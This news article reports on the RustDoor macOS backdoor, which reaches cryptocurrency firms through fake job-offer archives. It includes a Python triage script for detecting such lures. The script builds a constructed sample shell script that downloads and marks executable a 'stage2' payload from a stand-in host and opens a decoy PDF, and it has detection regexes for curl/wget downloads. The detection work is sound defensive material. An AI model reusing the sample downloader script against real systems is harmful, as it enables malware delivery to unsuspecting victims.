RustDoor macOS Backdoor Targets Cryptocurrency Firms with Fake Job Offers

By neub9

Feb 16, 2024

Newsroom

Endpoint Security / Cryptocurrency

Several companies in the cryptocurrency sector are under threat from a newly discovered Apple macOS backdoor named RustDoor.

RustDoor, a Rust-based malware capable of harvesting and uploading files as well as gathering system information, was first documented by Bitdefender. It is distributed by masquerading as a Visual Studio update.

While at least three different variants of the backdoor have been identified, the exact initial propagation mechanism remains unknown.

Bitdefender told The Hacker News that the malware was used as part of a targeted attack, noting that it found additional artifacts responsible for downloading and executing RustDoor.

“Some of these first stage downloaders claim to be PDF files with job offerings, but in reality, are scripts that download and execute the malware while also downloading and opening an innocuous PDF file that bills itself as a confidentiality agreement,” said Bogdan Botezatu, director of threat research and reporting at Bitdefender.

Three more malicious samples acting as first-stage payloads have come to light, each purporting to be a job offering. These ZIP archives predate the earlier RustDoor binaries by nearly a month.

The new component of the attack chain, the archive files (“Jobinfo.app.zip” or “Jobinfo.zip”), contain a basic shell script responsible for fetching the implant and opening a harmless decoy PDF file (“job.pdf”), hosted on the same site, as a distraction.
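The first-stage pattern described above (a small ZIP posing as a job offer, holding a shell script that fetches a remote payload and opens a decoy PDF) lends itself to a simple static triage check. The following is an added example written for this article, not Bitdefender's tooling or code from the actual samples: the archive contents, file names and the `example.invalid` domain are all constructed, and the regular expressions are heuristics chosen here, not published indicators.

```python
"""Static triage heuristic for ZIP lures shaped like the first stage
described in the article: a job-offer archive carrying a short shell
script that downloads an implant and opens a decoy PDF.
Added example; all sample data below is constructed."""
import io
import re
import zipfile

# Heuristic patterns (assumptions for this example, not published IoCs).
FETCH_RE = re.compile(r"\b(curl|wget)\b.*https?://", re.I)
EXEC_RE = re.compile(r"chmod\s+\+x|xattr\s+-[a-z]*d", re.I)
DECOY_RE = re.compile(r"\bopen\b.*\.pdf\b", re.I)
LURE_NAME_RE = re.compile(r"job|offer|nda|confidential", re.I)


def assess_archive(data: bytes, archive_name: str) -> dict:
    """Score a ZIP by archive name and by small text members that look like
    a downloader script. Returns a dict with findings and a verdict."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir() or info.file_size > 64 * 1024:
                continue  # a stage-0 script is tiny; skip big members
            blob = zf.read(info)
            if b"\x00" in blob[:512]:
                continue  # binary content, not a script
            text = blob.decode("utf-8", "replace")
            hits = {
                "fetch": bool(FETCH_RE.search(text)),
                "exec": bool(EXEC_RE.search(text)),
                "decoy_pdf": bool(DECOY_RE.search(text)),
                "in_app_bundle": ".app/Contents/MacOS/" in info.filename,
            }
            # Download plus either execution prep or a decoy open is the
            # combination the article describes.
            if hits["fetch"] and (hits["exec"] or hits["decoy_pdf"]):
                findings.append({"member": info.filename, **hits})

    score = 1 if LURE_NAME_RE.search(archive_name) else 0
    for f in findings:
        score += 2 + int(f["decoy_pdf"]) + int(f["in_app_bundle"])
    return {
        "archive": archive_name,
        "score": score,
        "findings": findings,
        "suspicious": score >= 3,
    }


def build_constructed_lure() -> bytes:
    """Constructed archive mimicking the described lure (not a real sample)."""
    script = (
        "#!/bin/sh\n"
        "curl -s https://example.invalid/stage2 -o /tmp/stage2\n"
        "chmod +x /tmp/stage2\n"
        "curl -s https://example.invalid/job.pdf -o /tmp/job.pdf\n"
        "open /tmp/job.pdf\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Jobinfo.app/Contents/MacOS/Jobinfo", script)
    return buf.getvalue()


def build_constructed_benign() -> bytes:
    """Constructed archive with the same lure-like name but harmless content."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("README.txt", "Thanks for applying. The role is described in job.pdf.\n")
        zf.writestr("job.pdf", b"%PDF-1.4\n% constructed placeholder, not a real document\n")
    return buf.getvalue()


if __name__ == "__main__":
    for name, data in (("Jobinfo.app.zip", build_constructed_lure()),
                       ("Jobinfo.zip", build_constructed_benign())):
        print(assess_archive(data, name))
```

The verdict threshold deliberately needs more than a suggestive file name: a job-themed archive on its own scores one point, while a member that both downloads from a URL and prepares execution or opens a PDF is what pushes it over. Tuning the member-size cap and the patterns to local mail-gateway traffic is expected; the point is that this stage is plain text and cheap to inspect before anything runs.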

Bitdefender said it also detected four new Golang-based binaries that communicate with an actor-controlled domain and collect information about the victim’s machine and its network connections.

In addition, the binaries can extract details about the disk and retrieve a wide list of kernel parameters and configuration values.

A closer investigation of the command-and-control (C2) infrastructure revealed a leaky endpoint that allows gathering details about the currently infected victims.

The development comes as South Korea’s National Intelligence Service (NIS) revealed that an IT organization affiliated with North Korea’s Workers’ Party is generating illicit revenue by selling malware-laced gambling websites to other cybercriminals for stealing sensitive data.

The company behind the malware-as-a-service (MaaS) scheme is Gyeongheung, a 15-member entity based in Dandong that has allegedly received payments from South Korean organizations.
